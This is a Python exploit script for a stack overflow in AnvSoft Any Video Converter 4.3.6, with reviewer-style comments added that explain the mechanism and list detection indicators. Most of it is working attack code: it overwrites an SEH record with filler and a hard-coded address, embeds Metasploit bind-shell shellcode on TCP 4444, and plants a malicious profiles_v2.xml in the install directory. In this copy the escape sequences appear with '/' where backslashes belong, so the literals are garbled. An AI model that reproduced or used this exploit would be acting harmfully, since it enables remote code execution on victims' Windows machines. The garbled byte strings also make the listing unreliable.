AnvSoft Any Video Converter 4.3.6 Stack Overflow Exploit


 

#!/usr/bin/python
#
# Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
# Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
# Website: http://www.spentera.com
# Platform: Windows
# Tested on: Windows XP SP3
# Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
#
# Reviewer summary (defensive reading of this listing):
#   * The script builds a profiles_v2.xml whose first <category> element has
#     a very long "name" attribute, then copies that file into the
#     application's install directory. The final status message tells the
#     operator to start the application, so the oversized attribute is
#     presumably consumed when the program loads its profile list; the page
#     does not show the vulnerable parsing code.
#   * The script only proceeds if it can write into the install directory
#     (see the IOError branch), so the directory's ACL is a relevant control:
#     an account without write access there cannot plant the file this way.
#   * Indicators visible in the listing: profiles_v2.xml modified by a
#     process other than the application, a category "name" attribute far
#     longer than any display name, and the application process listening on
#     TCP 4444 (the payload comment states LPORT=4444).
#   * The header lists only Windows XP SP3 as tested and names 4.3.6 as the
#     affected version; no fixed version is stated on the page.
# NOTE(review): in this copy the string literals are printed with "/" where
# escape sequences would normally appear, so the values below are plain text
# exactly as shown; lengths mentioned in comments describe the author's
# stated intent, not what this listing evaluates to.
import os,shutil,time,sys

def banner():
    # Prints the title, the credit for the original proof of concept and the
    # authors. Uses Python 2 print statements, like the rest of the script.
    print "/n/tAnvSoft Any Video Converter 4.3.6 Stack Overflow"
    print "/tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)"
    print "/tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research/n"
    print "/t----------------------------------------------------/n"

# Filler that precedes the two handler-record values in the attribute.
# 328 is the author's repeat count; the page does not explain how it was found.
junk = "/x90" * 328
# The names match the "next handler" and "handler" fields of a Windows
# structured-exception-handler record, which suggests the overflow is used to
# overwrite such a record on the stack -- inferred from the names, not shown.
nseh = "/xeb/x06/x90/x90"
# Hard-coded four-value constant. Presumably an address inside a module the
# application loads, which would tie the script to one build and OS layout;
# protections such as SafeSEH and ASLR target exactly this kind of fixed
# address -- TODO confirm against the affected binary.
seh  = "/xe4/xf3/x04/x10"

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# badchars = "/x00/x0a/x0d/x22/x26/x3e"
# Opaque, encoder-generated payload as described by the author's comment
# above; it is data and is left untouched by this review. The excluded
# characters listed in "badchars" include the double quote, ampersand and
# ">" -- characters that are significant inside an XML attribute value.
code = ("/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49"
"/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x48/x5a/x6a/x48"
"/x58/x30/x41/x30/x50/x42/x6b/x42/x41/x58/x41/x42/x32/x42/x41/x32"
"/x41/x41/x30/x41/x41/x58/x50/x38/x42/x42/x75/x59/x79/x69/x6c/x30"
"/x6a/x78/x6b/x32/x6d/x78/x68/x4b/x49/x4b/x4f/x4b/x4f/x4b/x4f/x41"
"/x70/x6c/x4b/x30/x6c/x51/x34/x66/x44/x6e/x6b/x72/x65/x35/x6c/x6c"
"/x4b/x73/x4c/x67/x75/x30/x78/x67/x71/x68/x6f/x4c/x4b/x50/x4f/x47"
"/x68/x4e/x6b/x41/x4f/x67/x50/x55/x51/x7a/x4b/x42/x69/x6c/x4b/x74"
"/x74/x4c/x4b/x36/x61/x78/x6e/x74/x71/x4b/x70/x4f/x69/x6e/x4c/x4f"
"/x74/x4b/x70/x70/x74/x65/x57/x4a/x61/x6b/x7a/x56/x6d/x47/x71/x4b"
"/x72/x5a/x4b/x58/x74/x35/x6b/x72/x74/x75/x74/x34/x68/x30/x75/x4b"
"/x55/x4c/x4b/x43/x6f/x57/x54/x36/x61/x68/x6b/x72/x46/x4e/x6b/x56"
"/x6c/x30/x4b/x6e/x6b/x43/x6f/x65/x4c/x67/x71/x4a/x4b/x44/x43/x54"
"/x6c/x4c/x4b/x6f/x79/x70/x6c/x74/x64/x35/x4c/x70/x61/x39/x53/x57"
"/x41/x69/x4b/x50/x64/x6c/x4b/x47/x33/x70/x30/x6c/x4b/x57/x30/x76"
"/x6c/x6c/x4b/x72/x50/x45/x4c/x6e/x4d/x4c/x4b/x53/x70/x43/x38/x63"
"/x6e/x55/x38/x6c/x4e/x30/x4e/x54/x4e/x78/x6c/x42/x70/x69/x6f/x6e"
"/x36/x53/x56/x63/x63/x70/x66/x33/x58/x54/x73/x36/x52/x53/x58/x61"
"/x67/x34/x33/x57/x42/x41/x4f/x53/x64/x39/x6f/x5a/x70/x45/x38/x68"
"/x4b/x7a/x4d/x39/x6c/x57/x4b/x66/x30/x6b/x4f/x49/x46/x63/x6f/x4b"
"/x39/x79/x75/x65/x36/x4f/x71/x58/x6d/x47/x78/x63/x32/x70/x55/x73"
"/x5a/x37/x72/x4b/x4f/x68/x50/x70/x68/x4e/x39/x74/x49/x4c/x35/x4c"
"/x6d/x71/x47/x4b/x4f/x4a/x76/x32/x73/x63/x63/x50/x53/x50/x53/x31"
"/x43/x52/x63/x73/x63/x47/x33/x33/x63/x59/x6f/x4e/x30/x31/x76/x30"
"/x68/x77/x61/x51/x4c/x31/x76/x51/x43/x4d/x59/x6a/x41/x6f/x65/x45"
"/x38/x4f/x54/x66/x7a/x50/x70/x6a/x67/x66/x37/x79/x6f/x6e/x36/x61"
"/x7a/x64/x50/x33/x61/x42/x75/x69/x6f/x6a/x70/x33/x58/x4c/x64/x6e"
"/x4d/x56/x4e/x39/x79/x73/x67/x4b/x4f/x7a/x76/x72/x73/x70/x55/x59"
"/x6f/x58/x50/x61/x78/x6a/x45/x41/x59/x6d/x56/x42/x69/x66/x37/x4b"
"/x4f/x4e/x36/x46/x30/x76/x34/x31/x44/x50/x55/x69/x6f/x4e/x30/x6e"
"/x73/x75/x38/x6b/x57/x64/x39/x49/x56/x43/x49/x46/x37/x39/x6f/x4b"
"/x66/x66/x35/x39/x6f/x68/x50/x75/x36/x62/x4a/x43/x54/x72/x46/x65"
"/x38/x65/x33/x70/x6d/x4f/x79/x6b/x55/x32/x4a/x46/x30/x46/x39/x41"
"/x39/x38/x4c/x4d/x59/x4d/x37/x41/x7a/x52/x64/x4f/x79/x6b/x52/x70"
"/x31/x4b/x70/x4c/x33/x4f/x5a/x49/x6e/x77/x32/x76/x4d/x69/x6e/x31"
"/x52/x64/x6c/x4e/x73/x4e/x6d/x43/x4a/x34/x78/x6e/x4b/x6e/x4b/x6c"
"/x6b/x50/x68/x62/x52/x4b/x4e/x78/x33/x54/x56/x4b/x4f/x73/x45/x32"
"/x64/x39/x6f/x38/x56/x61/x4b/x32/x77/x43/x62/x70/x51/x73/x61/x71"
"/x41/x63/x5a/x44/x41/x31/x41/x43/x61/x63/x65/x56/x31/x6b/x4f/x4e"
"/x30/x53/x58/x4c/x6d/x5a/x79/x54/x45/x58/x4e/x33/x63/x4b/x4f/x6b"
"/x66/x50/x6a/x39/x6f/x4b/x4f/x70/x37/x4b/x4f/x38/x50/x4e/x6b/x62"
"/x77/x49/x6c/x4c/x43/x49/x54/x43/x54/x69/x6f/x5a/x76/x56/x32/x79"
"/x6f/x6e/x30/x50/x68/x53/x4e/x6a/x78/x7a/x42/x44/x33/x52/x73/x39"
"/x6f/x4e/x36/x79/x6f/x68/x50/x48")

# Trailing filler appended after the payload; the expression pads so that
# code plus filler reaches 1000 when len(code) is below 1000.
sisa = "/x90" * (1000-len(code))

# The XML document written to disk. Everything except the "name" attribute of
# the single <category> element is ordinary profile markup; that attribute is
# the concatenation junk + nseh + seh + code + sisa, i.e. the oversized field.
# A parser-side fix would bound the length of attribute values before copying
# them into a fixed-size buffer -- the vulnerable code is not on this page.
poc = "<root>/n"
poc+= "<categories>/n"
poc+= "<category name=/""+junk+nseh+seh+code+sisa+"/" id=/"0/" icon=/"cat_all.bmp/" desc=/"All Profiles/"/>/n"
poc+= "</categories>/n"
poc+= "<groups></groups>/n<profiles></profiles>/n</root>/n"

# Output file name; note that "file" shadows the Python 2 builtin of the same name.
file = "profiles_v2.xml"
# Absolute path of the file in the current working directory (copy source).
splash=os.path.abspath(file)
# Hard-coded install directory the file is copied into.
profdir="C:/Program Files/AnvSoft/Any Video Converter Professional"

# The file is opened before any platform or directory check, so an empty
# profiles_v2.xml is left in the working directory on every failure path and
# the handle is only closed on the success path.
writeFile = open(file, "w")
if os.name == 'nt':
    if os.path.isdir(profdir):
        try:
            writeFile.write(poc)
            banner()
            print "[*] Creating the malicious",file
            # Cosmetic pause between the two status messages.
            time.sleep(1)
            print "[*] Malicious",file,"created.."
            writeFile.close()
            # Overwrites/places the profile file in the install directory;
            # this is the step that needs write access to that directory.
            shutil.copy2(splash,profdir)
            print "[*] File",file,"has been copied to",profdir
            print "[*] Now open AnvSoft program and telnet to port 4444"
        except IOError:
            # Covers failures from both the local write and the copy.
            print "[-] Could not write to destination folder, check permission.."
            # sys.exit() without an argument exits with status 0, so callers
            # cannot distinguish this failure from success by exit code.
            sys.exit()
    else:
        print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
        sys.exit()
else:
    print "[-] Please run this script on Windows."
    sys.exit()

 
